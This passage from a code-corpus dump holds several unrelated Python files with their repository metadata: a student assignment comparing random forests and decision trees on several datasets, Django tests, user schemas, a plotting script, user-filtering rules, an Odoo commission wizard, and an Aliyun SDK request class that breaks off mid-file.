the existing code from assignment1. Use this to check how different the results are (score and
predictions).
"""
df = read_dataset(Path('..', '..', 'iris.csv'))
for c in list(df.columns):
# Notice that I am now passing though all columns.
# If your code does not handle normalizing categorical columns, do so now (just return the unchanged column)
df = fix_outliers(df, c)
df = fix_nans(df, c)
df[c] = normalize_column(df[c])
X, y = df.iloc[:, :4], df.iloc[:, 4]
le = generate_label_encoder(y)
# Be careful to return a copy of the input with the changes, instead of changing inplace the inputs here!
y_encoded = replace_with_label_encoder(y.to_frame(), column='species', le=le)
rf = simple_random_forest_classifier(X, y_encoded['species'])
'''
!!Explanation!!
Both the classifier in this function and the one in the last yield just about the same score on average
I believe this is because the two datasets are essentially the same at this point:
They both have label encoded classes
The only difference is this function removed nans and outliers, which the dataset does not possess many of anyway
And also normalizes the dataset, which from what my understanding might not actually change the values
in relation to other values. This normalization may just make the model in this function more efficient!
Due to this potential boost in efficiency due to normalization, I would choose this function's model over the last
'''
print(rf['accuracy'])
return rf
##############################################
# Implement all the below methods
# Don't install any other python package other than provided by python or in requirements.txt
##############################################
def random_forest_iris_dataset_again() -> Dict:
"""
Run the result of the process iris again task of e_experimentation and discuss (1 sentence)
the differences from the above results. Use the same random forest method.
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_iris_dataset()
X, y = df.iloc[:, :5], df.iloc[:, 5:]
rf = simple_random_forest_classifier(X, y)
'''
!!!Explanation!!!
There are not too many differences present, as the datasets are the same.
The datasets are quite balanced, and the train and test are properly split so we can rule out model
over fitting for the most part.
Although the labels are encoded in different ways, their meanings are not changed between models.
The only notable difference is that the process_iris_dataset() classifier has a slightly lower score on average.
I believe this is because the process_iris_dataset() has an additional numeric mean column.
This may provide extra noise to the dataset, which results in the classifier being slightly worse!
I think this adds noise as the mean of each column doesn't really provide any new information that may benefit
this specific classification task.
To combat this, I believe running some feature selection and decsriptive analysis on the dataset, and
dropping a few of the less relevant columns may improve the model.
A feature selection method that may prove useful here is the Pandas correlation function "corr()" - to find the
strength of the correlation between each feature and the target label.
'''
print(rf['accuracy'])
return rf
def decision_tree_classifier(X: pd.DataFrame, y: pd.Series) -> Dict:
"""
Reimplement the method "simple_random_forest_classifier" but using the technique we saw in class: decision trees
(you can use sklearn to help you).
Optional: also optimise the parameters of the model to maximise accuracy
:param X: Input dataframe
:param y: Label data
:return: model, accuracy and prediction of the test set
"""
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)
# max_features = 1
# max_depth = 2
# max_leaf_nodes = 2
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test) # Use this line to get the prediction from the model
accuracy = model.score(X_test, y_test)
return dict(model=model, accuracy=accuracy, test_prediction=y_predict)
def train_iris_dataset_again() -> Dict:
"""
Run the result of the iris dataset again task of e_experimentation using the
decision_tree classifier AND random_forest classifier. Return the one with highest score.
Discuss (1 sentence) what you found different between the two models and scores.
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_iris_dataset()
X, y = df.iloc[:, :5], df.iloc[:, 5:]
rf = simple_random_forest_classifier(X, y)
dt = decision_tree_classifier(X, y)
print(rf)
print(dt)
'''
!!!Explanation!!!
I may be inclined to choose the decision tree here (in this specific case) over the random forest
Though random forests are typically known to be more accurate, this is because they take the average of many
decision trees, rather than just one. This makes the decision tree more efficient in time and space as it requires
only one tree, instead of many.
In this specific instance, it seems that on average the decision tree is just as accurate as the random forest
I believe this is due to the data set being both balanced and easily separable.
Therefore I will take the decision tree over the random forest,
as the decision tree is yielding around the same accuracy on average, AND is more efficient.
This is just for this specific function though, I think overall random forests are usually the way to go,
even if they require more time and resources to execute; they do solve a lot of accuracy issues the decision
trees may have, such as overfitting.
'''
if rf['accuracy'] > dt['accuracy']:
print('random forest wins')
return rf
else:
print('decision tree wins')
return dt
def train_amazon_video_game_again() -> Dict:
"""
Run the result of the amazon dataset again task of e_experimentation using the
decision tree classifier AND random_forest classifier. Return the one with highest score.
The Label column is the user column. Choose what you wish to do with the time column (drop, convert, etc)
Discuss (1 sentence) what you found different between the results.
In one sentence, why is the score worse than the iris score (or why is it not worse) in your opinion?
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_amazon_video_game_dataset_again()
'''
!!!Explanation!!!
This is the most significant preprocess action I make
I have decided to remove all rows that have labels that appear less than 10 times in the dataset
I find this solves many of the issues I was having with this data set
1. In classification, the model must train itself using the available labels in the training set, and then tests its
performance predicting those labels with the testing set. I found as there are many unique instances in this dataset
the model would evaluate instances that had labels which the model had not even seen before. This is problematic as
the model would essentially make a guess at the instance, and because it did not know the correct label, it would
always get it wrong. To fix the data set, it may be good to collect some data to help inflate those unique instances
and thus balancing the dataset, or to somehow generalize labels so they are not so specific to a point where there
are single instances with a unique label.
2. This also significantly reduces the size of the data set, which allows the model to run efficiently without
sacrifices to the Decision Tree or Random Forest models. The data set is reduced to nearly half of what it used to
be when you remove unique instances, and even more when you only look at labels that appear at least 10 times.
'''
df = df.drop(df[df['user_count'] < 10].index)
print(df)
X, y = df.iloc[:, 1:], df.iloc[:, :1]
'''
!!!Explanation!!!
I decided to drop the time column as I personally don't think it will have a correlation with the target labels.
The time only seems to indicate the activity of the user, which is easily updates once the user reviews again.
Thus, my theory is that the model might learn to check when a user is active, which could overfit the model if user
activity is somewhat random.
For example, if they reviewed a video game that came out today, after not reviewing one after 10 years,
the model may not predict the user because it is biased to the activity dates.
Sometimes sequels to games come out after a long, long time as any video game fan knows, and perhaps a player might
want to review the newest sequel of a game series they used to like to review.
I believe the model should be able to predict the user from other features relating to the users rating behaviours,
but should be independent of time, as there are no set rules to when a user might review
'''
X = X.drop(['time'], axis=1)
'''
!!!Explanation!!!
I decided to label encode the 'asin' data column. I believe this may be important to the models classification as
there may be some sort of pattern between the user and the types of video games they review.
For example, maybe user John only reviews Halo games, and never Call of Duty games.
As this data type is a string, I needed some way to encode it. My first thought was one hot encoding but there are
many different 'asin' attributes, so to one hot encode that we would need to use A LOT of bits. Thus one hot
encoding seemed inefficient for space, thus label encoding these values seemed to be the next best option, as to the
model the newly allocated numeric names to the 'asin' data will not change its meaning if patterns are present.
'''
le = LabelEncoder()
X['asin'] = le.fit_transform(X['asin'])
# this is here to convert shape to (n,) to prevent future warnings
y = y.values.ravel()
le = LabelEncoder()
y_encoded = le.fit_transform(y)
'''
!!!Explanation!!!
I used a special random forest compared to the others I've been using
The default estimator size (number of trees in the forest) is 100 according to the scikit learn documentation.
If I execute my code with that amount of estimators, my computer would run out of memory and the program crashes,
thus after playing around with the hyper parameter of the random forest, I settled at 5 estimators. Once again, I'm
sure the ideal number of estimators is more, but due to memory limitations I am using 5 estimators.
'''
rf = simple_random_forest_classifier(X, y_encoded, 'Amazon')
print(rf)
dt = decision_tree_classifier(X, y_encoded)
print(dt)
'''
!!!Results!!!
The decision tree is returning around a .5 accuracy score.
The random forest classifier is returning around the same accuracy score on average.
This specific function takes a long time to run as there is a ton of data to be processed, even with the
preprocessing.
I think there is room for overfitting here due to the duplicate values in the data set.
This is an issue because these values may be ending up in both the training and the testing set, leading to a bias
for that one set. It is difficult to compensate for these duplicates with the data we have, so I believe a solution
to this may be to collect some more data relating to each specific row, perhaps more information relating to the
users specific review for each review. These features may include some traits coming from the field of NLP, such as
semantic and sentiment analysis. Perhaps the model would be able to pick up on some patterns relating to how the
user writes, while also not being biased towards specific labels due to data duplication.
'''
if rf['accuracy'] > dt['accuracy']:
print('random forest wins!')
return rf
else:
print('decision tree wins!')
return dt
def train_life_expectancy() -> Dict:
"""
Do the same as the previous task with the result of the life expectancy task of e_experimentation.
The label column is the column which has north/south. Remember to convert drop columns you think are useless for
the machine learning (say why you think so) and convert the remaining categorical columns with one_hot_encoding.
(check the c_regression examples to see example on how to do this one hot encoding)
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_life_expectancy_dataset()
'''
!!!Explanation!!!
I dropped the year column as there are many and more Nan values within
It is not really a value you can simply fix by average the columns that are not empty
Logically that would not make sense, and I believe by doing that the year column would become misrepresented
I do not predict this to affect accuracy all that much as year should not have that big of an impact on the
classification of the country being in the north or south, as this function is doing
'''
df = df.drop(['year'], axis=1)
'''
!!!Explanation!!!
The expectancy column also has a lot of Nan values, so I decided to replace those Nans with the average of that
column. I believe this is appropriate as the life expectancy is probably around the same range for each country in
this dataset, so taking the average of it is a good measure of the life expectancy for any country.
Note: This hypothesis may not be great as the range of expectancy is quite large, from my preprocessing it will be
around 75 years; but given that some countries are developing, as well as the data being from many years ago,
for now I believe the mean can still give a better representation than nothing!
'''
mean = get_column_mean(df, 'expectancy')
df['expectancy'].fillna(value=mean, inplace=True)
X = df
X = X.drop(['latitude'], axis=1)
y = df['latitude']
print(X)
print(y)
'''
!!! Explanation !!!
I decided to label encode the country name
I could not leave them as strings as the model would not be able to read it, and I think one hot encoding the names
would be very space innificient as there are many different country names, and we would need a lot of bits to
one hot encode them all!
'''
le = generate_label_encoder(X['name'])
X['name'] = le.fit_transform(X['name'])
rf = simple_random_forest_classifier(X, y)
dt = decision_tree_classifier(X, y)
'''
!!!Explanation!!!
Both the decision tree and the random forest are performing very well, both with ~.99 accuracy scores.
From the results, both performed much better than any function we have classified before.
I am inclined to believe that this data set has lead to some overfitting, due to an unbalanced dataset.
The dataset for example, has the country Afghanistan many times, each attribute being the same as the year has been
removed and many of the expectancy missing values are set to that columns mean.
This introduces overfitting because the duplicate data instances may go into both the training and testing set,
contamination!! This is not good as the model will be tested on things it already knows, giving it 100% on it
almost automatically... kind of like the model is cheating on a test. Given a completely brand new data set,
I think the models performance would drop.
Due to this data imbalance, I don't think this dataset is that great to run classification on, even with all of the
preprocessing. I believe a solution to this would be to of course balance out the data set, by collecting more
information about other countries that are less represented in the dataset, as well as add dimensions that are not
so redundant as missing or mean expectancies; perhaps more general features relating to the weather if we are still
trying to predict if it is in the north or south.
'''
if rf['accuracy'] > dt['accuracy']:
print('random forest wins')
return rf
else:
print('decision tree wins')
return dt
def your_choice() -> Dict:
"""
Now choose one of the datasets included in the assignment1 (the raw one, before anything done to them)
and decide for yourself a set of instructions to be done (similar to the e_experimentation tasks).
Specify your goal (e.g. analyse the reviews of the amazon dataset), say what you did to try to achieve the goal
and use one (or both) of the models above to help you answer that. Remember that these models are classification
models, therefore it is useful only for categorical labels.
We will not grade your result itself, but your decision-making and suppositions given the goal you decided.
Use this as a small exercise of what you will do in the project.
"""
'''
!!!My Goal!!!
I will be using the dataset "Geography"
With this dataset, I want to find out if we can fit a model to predict the World Bank Income Group of a country
given a some geographical and bank related features
To find this out, I will preprocess the data in the following ways:
- Fix any missing data in the columns that are mentioned below
- Extract and label encode the World Bank groups column into the labels vector
- Extract and one hot encode World bank region column into the features vector
- Extract latitude into the features vector
- Extract longitude into the features vector
I will train both a Decision Tree and Random Forest to find my goal, and return the model with the greater accuracy
'''
df = pd.read_csv(Path('..', '..', 'geography.csv'))
'''
!!!Explanation!!!
The only columns with Nans for the target features for this were from the Vatican,
so I replaced their null values with the values from Italy.
I know they are technically separate, but until the data set can be filled we will simply consider them the same.
'''
df['World bank region'].fillna(value='Europe & Central Asia', inplace=True)
df['World bank, 4 income groups 2017'].fillna('High Income', inplace=True)
le = generate_label_encoder(df_column=df['World bank, 4 income groups 2017'])
df = replace_with_label_encoder(df=df, column='World bank, 4 income groups 2017', le=le)
ohe = generate_one_hot_encoder(df_column=df['World bank region'])
df = replace_with_one_hot_encoder(df=df, column='World bank region', ohe=ohe,
ohe_column_names=ohe.get_feature_names())
columns = ['Latitude', 'Longitude', 'x0_East Asia & Pacific', 'x0_Europe & Central Asia',
'x0_Latin America & Caribbean', 'x0_Middle East & North Africa', 'x0_North America',
'x0_South Asia', 'x0_Sub-Saharan Africa']
X = df[columns]
y = df['World bank, 4 income groups 2017']
dt = decision_tree_classifier(X=X, y=y)
#print(dt)
rf = simple_random_forest_classifier(X=X, y=y)
#print(rf)
'''
!!!My Results!!!
It seems that once again on average the Decision Tree and Random Forest are yielding similar results.
Their accuracies are quite low, and range from around 50 to nearly 70 percent accuracy.
I don't think a lot of overfitting is occurring here, as the datasets are well balanced, and properly split
into training and testing.
The data set does have a lack of columns that relate to the economy, wealth, or demographics of the country,
So I believe that more data may improve the model to fit a mapping between the demographic and wealth data of a
given country, and its income group (target label).
Features that could be collected as additional data columns could include things such as average income, employment
rate, tax information, and more!
I believe although this model is just a start, it could be beneficial to companies who are figuring out economic
policies or tax plans. I believe, the ability to use this model while trying to come up with plans to benefit a
country's economy could be useful, with enough relevant training and data :)
'''
if rf['accuracy'] > dt['accuracy']:
#print('random forest wins')
return rf
else:
#print('decision tree wins')
return dt
if __name__ == "__main__":
assert simple_random_forest_on_iris() is not None
assert reusing_code_random_forest_on_iris() is not None
assert random_forest_iris_dataset_again() is not None
assert train_iris_dataset_again() is not None
assert train_amazon_video_game_again() is not None
assert train_life_expectancy() is not None
assert your_choice() is not None
|
[
"noreply@github.com"
] |
noreply@github.com
|
cff3e9148fe021dbca2f36fd24270a1aace86027
|
d9aa525b6a359378572fa7e48bd4fb8529b9ce23
|
/monitoring/services/tests.py
|
2e6a0fa69ed320fbbe1fcc4f7506227fdb4949ab
|
[
"Apache-2.0"
] |
permissive
|
naanal/monasca-ui
|
cb5b7c279836d31809392d5b4572536fbea3634e
|
37d8926015e35f8949606183469d532924ab58c2
|
refs/heads/master
| 2020-02-26T13:04:25.471867
| 2016-08-16T05:39:24
| 2016-08-16T05:39:24
| 64,387,546
| 0
| 0
| null | 2016-07-28T10:46:54
| 2016-07-28T10:46:53
| null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
# coding=utf-8
from django.core import urlresolvers
from django.test import RequestFactory
from mock import patch, call # noqa
from monitoring.test import helpers
from monitoring.services import constants
from monitoring.services import views
INDEX_URL = urlresolvers.reverse(
constants.URL_PREFIX + 'index')
class ServicesTest(helpers.TestCase):
def test_index_get(self):
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(
res, 'monitoring/services/index.html')
self.assertTemplateUsed(res, 'monitoring/services/monitor.html')
class KibanaProxyViewTest(helpers.TestCase):
def setUp(self):
super(KibanaProxyViewTest, self).setUp()
self.view = views.KibanaProxyView()
self.request_factory = RequestFactory()
def test_get_relative_url_with_unicode(self):
"""Tests if it properly converts multibyte characters"""
import urlparse
self.view.request = self.request_factory.get(
'/', data={'a': 1, 'b': 2}
)
expected_path = ('/elasticsearch/.kibana/search'
'/New-Saved-Search%E3%81%82')
expected_qs = {'a': ['1'], 'b': ['2']}
url = self.view.get_relative_url(
u'/elasticsearch/.kibana/search/New-Saved-Searchあ'
)
# order of query params may change
parsed_url = urlparse.urlparse(url)
actual_path = parsed_url.path
actual_qs = urlparse.parse_qs(parsed_url.query)
self.assertEqual(actual_path, expected_path)
self.assertEqual(actual_qs, expected_qs)
|
[
"rajagopalx@gmail.com"
] |
rajagopalx@gmail.com
|
7771948bcd169782ab2c13192c605d49d242b9ed
|
70bf561fb6b77577eebd3f14500cb457da25bdd2
|
/backend/api/features/users/schemas.py
|
2ad0cf8983ef8ee9e7401fa479039b75832e4bdb
|
[
"MIT"
] |
permissive
|
mmvo91/recipe-manager
|
cdfeb066e5f5343a9fc4aa5b7bcf4b6d815c09e1
|
522804f2ef49ddd4bcd9f073a8d0beaf893ed8c0
|
refs/heads/master
| 2023-02-05T22:52:46.227482
| 2020-12-30T09:37:21
| 2020-12-30T09:37:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
from api.utils.schema import JSONModel
class UserBase(JSONModel):
username: str
email: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
active: bool
class Config:
orm_mode = True
class UserLogin(JSONModel):
username: str
password: str
|
[
"michaelmvo91@gmail.com"
] |
michaelmvo91@gmail.com
|
fe7d9893fb76b7eb624d74e9a5ceebe38ecee595
|
3b0657e8edd9390518e5c14d15878e25683bfe91
|
/FORTRAN/DMMulti/scripts/param_red.py
|
8bb8fb9ca8fab4363d6ec2e5d5466491a37be1dc
|
[] |
no_license
|
lmpizarro/atomistic_simulation
|
d3038ff4b1d106662904207099c42b4bccee9f0b
|
d526b1bda6d258e3ab4e4a8619331849b7a0c2bf
|
refs/heads/master
| 2021-01-10T08:17:00.947930
| 2018-11-29T22:06:58
| 2018-11-29T22:06:58
| 46,139,007
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 827
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
axis_font = { 'size':'20'}
plt.figure(1,figsize=(8,6))
x = [5.0 ,
5.3 ,
5.5 ,
5.6 ,
5.7 ,
5.8 ,
5.9 ,
5.95,
6.0 ,
6.1 ,
6.2 ,
6.3 ,
6.4 ,
6.5 ,
6.6 ,
6.7 ]
y = [ 16.8 ,
0.388 ,
-4.03 ,
-5.2 ,
-5.92 ,
-6.32 ,
-6.488,
-6.5 ,
-6.483,
-6.37 ,
-6.17 ,
-5.92 ,
-5.54 ,
-5.34 ,
-5.72 ,
-5.59 ]
x = np.asarray(x) / 4.0
y = np.asarray(y)
plt.plot(x,y,'k.',markersize=10)
plt.title(u'Energía potencial a $T^*=0$')
plt.xlabel('$a^*$',**axis_font)
plt.ylabel(u'$U^*$',**axis_font)
plt.ylim(-6.6,-5.1)
plt.xlim(1.35,1.7)
plt.grid(True)
plt.show()
|
[
"pbellino@gmail.com"
] |
pbellino@gmail.com
|
4c19d1c4ca2143d49702c83bd6fe7486af618b32
|
6df4a4cbdaf59009838b2c70b518e66633c67de0
|
/user_portrait/cron/recommentation_in/filter_rules.py
|
c4a58b227bbab39a9fd134e2bd2cc7cfcf24955f
|
[] |
no_license
|
jianjian0dandan/user_portrait
|
ccf5f43f0aca2d40581faae215fdda1db997a354
|
3114ca2fcec23a7039887cca953793ef34cb7f72
|
refs/heads/master
| 2021-01-15T19:59:16.286276
| 2016-05-18T03:30:37
| 2016-05-18T03:30:37
| 42,869,391
| 0
| 0
| null | 2015-09-21T13:56:51
| 2015-09-21T13:56:51
| null |
UTF-8
|
Python
| false
| false
| 4,731
|
py
|
# -*- coding: UTF-8 -*-
import sys
import csv
import json
import time
reload(sys)
sys.path.append('../../')
from global_utils import R_CLUSTER_FLOW2 as r_cluster
from global_utils import R_DICT, es_retweet, retweet_index_name_pre, retweet_index_type
from time_utils import datetime2ts, ts2datetime
from parameter import DAY
from parameter import RUN_TYPE, RUN_TEST_TIME
from parameter import RECOMMEND_IN_ACTIVITY_THRESHOLD as activity_threshold
from parameter import RECOMMEND_IN_IP_THRESHOLD as ip_threshold
from parameter import RECOMMEND_IN_RETWEET_THRESHOLD as retweet_threshold
from parameter import RECOMMEND_IN_MENTION_THRESHOLD as mention_threshold
from cron.detect.cron_detect import get_db_num
csvfile = open('/home/ubuntu8/huxiaoqian/user_portrait/user_portrait/cron/recommentation_in/filter_uid_list.csv', 'wb')
writer = csv.writer(csvfile)
def filter_activity(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
ts = datetime2ts(now_date) - DAY
date = ts2datetime(ts)
timestamp = datetime2ts(date)
for user in user_set:
over_count = 0
for i in range(0,7):
ts = timestamp - DAY*i
result = r_cluster.hget('activity_'+str(ts), str(user))
if result:
items_dict = json.loads(result)
for item in items_dict:
weibo_count = items_dict[item]
if weibo_count > activity_threshold:
over_count += 1
if over_count == 0:
results.append(user)
else:
writer.writerow([user, 'activity'])
return results
def filter_ip(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
ts = datetime2ts(now_date) - DAY
for user in user_set:
ip_set = set()
for i in range(0,7):
timestamp = ts - DAY*i
ip_result = r_cluster.hget('ip_'+str(ts), str(user))
if ip_result:
result_dict = json.loads(ip_result)
else:
result_dict = {}
for ip in result_dict:
ip_set.add(ip)
if len(ip_set) < ip_threshold:
results.append(user)
else:
writer.writerow([user, 'ip'])
return results
def filter_retweet_count(user_set):
FILTER_ITER_COUNT = 100;
results = []
now_ts = time.time()
db_number = get_db_num(now_ts)
retweet_index_name = retweet_index_name_pre + str(db_number)
# test
search_user_count = len(user_set);
iter_search_count = 0
while iter_search_count < search_user_count:
iter_search_user_list = user_set[iter_search_count:iter_search_count + FILTER_ITER_COUNT]
try:
retweet_result = es_retweet.mget(index = retweet_index_name, doc_type = retweet_index_type,\
body = {'ids':iter_search_user_list}, _source=True)['docs']
except:
retweet_result = []
for retweet_item in retweet_result:
if retweet_item['found']:
retweet_set = set()
user = retweet_item['_id']
per_retweet_result = json.loads(retweet_item['_source']['uid_retweet'])
for retweet_user in per_retweet_result:
retweet_set.add(retweet_user)
if len(retweet_set) < retweet_threshold:
results.append(user)
else:
writer.writerow([user, 'retweet'])
else:
user = retweet_item['_id']
results.append(user)
iter_search_count += FILTER_ITER_COUNT
return results
def filter_mention(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
timestamp = datetime2ts(now_date) - DAY
date = ts2datetime(timestamp)
for user in user_set:
mention_set = set()
for i in range(0,7):
ts = timestamp - DAY*i
result = r_cluster.hget('at_'+str(ts), str(user))
if result:
item_dict = json.loads(result)
for at_user in item_dict:
mention_set.add(at_user)
at_count = len(mention_set)
if at_count < mention_threshold:
results.append(user)
else:
writer.writerow([user, 'mention'])
return results
|
[
"1257819385@qq.com"
] |
1257819385@qq.com
|
eb254cada685f3a07b8214c37d6b93437b6240bd
|
cca32ed9fa8ee69550b46b42a689bad6ca03b256
|
/wizards/generate_commission.py
|
f0ff3b468a994e75af5c8d5ee53ffe38c4940392
|
[] |
no_license
|
mohamedabuemira/courier
|
724dba8d4a734046c1085ffad97948869f069f38
|
d0574b157a1fb62fb0be11a68afa444c1d77dd5f
|
refs/heads/main
| 2023-09-01T07:03:08.412409
| 2021-10-29T23:33:23
| 2021-10-29T23:33:23
| 422,737,366
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,685
|
py
|
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
from datetime import date
class SalesCommissionWizard(models.TransientModel):
_name = 'sales.commission.wizard'
date_from = fields.Date(string='Date From')
date_to = fields.Date(string='Date To')
user_ids = fields.Many2many('hr.employee', string="Sales Drivers",
domain = '[("driver", "=", "Ture")]')
ignore_late_payments = fields.Boolean('Ignore Sales with late payments')
late_payments_exceed = fields.Integer('Late payments exceeds to')
@api.constrains('date_from', 'date_to')
def dates_constrains(self):
for rec in self:
if rec.date_from > rec.date_to:
raise ValidationError('Date To Must Be Greater Than Date From.')
def ignore_unpaid_orders(self, sales_orders):
eligible_sale_orders = self.env['account.move']
for order in sales_orders:
paid_invoices = order.invoice_ids.filtered(lambda x:x.invoice_payment_state == 'paid' and x.type == 'out_invoice')
if paid_invoices:
paid_amount = sum(paid_invoices.mapped('amount_total'))
needs_to_pay = order.amount_total
if paid_amount >= needs_to_pay:
last_paid_invoice_date = max(paid_invoices.mapped('invoice_date'))
if last_paid_invoice_date and last_paid_invoice_date >= self.date_from and last_paid_invoice_date <= self.date_to:
if self.ignore_late_payments:
payment_due_days = (last_paid_invoice_date - order.date_order.date()).days
if payment_due_days >= self.late_payments_exceed:
continue
eligible_sale_orders += order
return eligible_sale_orders
def action_generate_commissions(self):
if not self.user_ids:
self.user_ids = self.env['hr.employee'].search([])
user_id_list = self.user_ids and self.user_ids.ids or []
sales_orders = self.env['account.move'].search([('is_commission_created', '=', False),('driver', 'in', user_id_list)])
sale_orders = sales_orders
user_wise_so = {}
for user in sale_orders.mapped('driver'):
so_of_this_user = sale_orders.filtered(lambda x:x.driver == user)
user_wise_so.update({user:so_of_this_user})
commission_obj = self.env['sale.order.commission']
commission_fix = self.env['fixed.commission.line']
special_comm_line = self.env['special.commission.line']
for user,sale_orders in user_wise_so.items():
re_calculate_sales = False
existing = self.env['sale.order.commission'].search([('salesperson', '=', user.id),('state','=','draft')],
limit=1)
if existing and sale_orders:
re_calculate_sales = existing.mapped('invoice_line_ids')
existing.unlink()
sale_orders = sale_orders + re_calculate_sales if re_calculate_sales else sale_orders
vals = {}
structure_id = user.commission_structure_id
if not structure_id:
continue
order_lines = sale_orders.mapped('invoice_line_ids')
exclude_products = structure_id.exclude_line_ids.mapped('product_id')
special_lines = order_lines.filtered(lambda x: x.product_id in exclude_products)
special_sales = sum(special_lines.mapped('price_subtotal'))
general_lines = order_lines.filtered(lambda x: x.product_id not in exclude_products)
general_sales = sum(general_lines.mapped('price_subtotal'))
net_sales = general_sales + special_sales
if structure_id.deduction_type:
if structure_id.deduction_type == 'fixed':
deduct_sales = general_sales - structure_id.deduction_amount
deduct_amount = str(structure_id.deduction_amount) + '/-'
else:
deduct_sales = (general_sales * structure_id.deduction_amount) / 100
deduct_amount = str(structure_id.deduction_amount) + '%'
else:
deduct_sales = (net_sales)
sale_ids = [(6, 0, sale_orders.ids)]
vals.update({
'commission_structure_id':structure_id.id,
'salesperson':user.id,
'general_amount':general_sales,
'special_amount':special_sales,
'net_amount':net_sales,
'sale_order_ids':sale_ids,
'deduct_amount':deduct_amount
})
for line in structure_id.commission_line_ids:
if general_sales >= line.amount_above and general_sales < line.amount_less_than:
general_cal = str(line.commission_percent) + '%'
general_commission = (deduct_sales * line.commission_percent) / 100
vals.update({
'general_cal':general_cal,
'general_commission':general_commission
})
commission_id = commission_obj.create(vals)
for line in structure_id.fixed_line_ids:
general_fix = str(line.fix_qty) + '%'
commissionfixed =( deduct_sales * line.fix_qty) / 100
fix_vals = {
'sales_commission_id_fixed': commission_id.id,
'general_fixed': general_fix,
'fixed_commission': commissionfixed,
'general_amount_fixed': general_sales,
'deduct_amount_fixed': deduct_amount
}
commission_fix.create(fix_vals)
fixed_commission = sum(commission_id.mapped('fixed_commission_line_ids').mapped('fixed_commission'))
for line in structure_id.exclude_line_ids:
order_line = special_lines.filtered(lambda x : x.product_id == line.product_id)
total_price = sum(order_line.mapped('price_subtotal'))
total_qty = sum(order_line.mapped('quantity'))
if line.compute_type == 'percentage':
cal = str(line.commission_per_drum) + '%'
commission = (total_price * line.commission_per_drum) / 100
else:
cal = str(line.commission_per_drum) + '/-'
commission = total_qty * line.commission_per_drum
special_vals = {
'sales_commission_id':commission_id.id,
'product_id':line.product_id.id,
'qty_sold':total_qty,
'amount':total_price,
'cal':cal,
'commission':commission
}
special_comm_line.create(special_vals)
special_commission = sum(commission_id.mapped('special_commission_line_ids').mapped('commission'))
net_commission = commission_id.general_commission + fixed_commission + special_commission
commission_id.write({
'special_commission':special_commission,
'fixed_commission': fixed_commission,
'net_commission':net_commission
})
[order.write({'is_commission_created':True}) for order in sale_orders]
return {'effect': {'fadeout': 'slow',
'message': "Yeah %s, It's Done." % self.env.user.name,
'img_url': '/web/static/src/img/smile.svg', 'type': 'rainbow_man'}}
|
[
"mohamed.abuemira@gmial.com"
] |
mohamed.abuemira@gmial.com
|
170ccd24c50321c37c6335c0652314406ed7802a
|
22a7161361089b84a09457b46d79ce2bd87f5b2c
|
/tests/urls.py
|
bb83d09b1ab5c7ac9d1103f51acf97588d336b6b
|
[] |
no_license
|
matthew-a-dunlap/django-inspectional-registration
|
56fb9b9945d41de069034fd066e3b92b388b8498
|
d6dd945718e5f7ac09966763c83104c4966cb775
|
refs/heads/master
| 2020-09-09T17:33:18.128626
| 2016-05-23T19:57:19
| 2016-05-23T19:57:19
| 221,512,520
| 0
| 0
| null | 2019-11-13T17:13:08
| 2019-11-13T17:13:07
| null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
from django.conf.urls import url, patterns, include
except ImportError:
from django.conf.urls.defaults import url, patterns, include
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^registration/', include('registration.urls')),
)
|
[
"lambdalisue@hashnote.net"
] |
lambdalisue@hashnote.net
|
1e44f68b4293ce9210579097294860acfc7ebac2
|
f8f2536fa873afa43dafe0217faa9134e57c8a1e
|
/aliyun-python-sdk-ons/aliyunsdkons/request/v20190214/UntagResourcesRequest.py
|
3e59f17cdafd0c517f61e6e5a9daaacecfc58d26
|
[
"Apache-2.0"
] |
permissive
|
Sunnywillow/aliyun-openapi-python-sdk
|
40b1b17ca39467e9f8405cb2ca08a85b9befd533
|
6855864a1d46f818d73f5870da0efec2b820baf5
|
refs/heads/master
| 2022-12-04T02:22:27.550198
| 2020-08-20T04:11:34
| 2020-08-20T04:11:34
| 288,944,896
| 1
| 0
|
NOASSERTION
| 2020-08-20T08:04:01
| 2020-08-20T08:04:01
| null |
UTF-8
|
Python
| false
| false
| 2,302
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkons.endpoint import endpoint_data
class UntagResourcesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ons', '2019-02-14', 'UntagResources','ons')
self.set_method('POST')
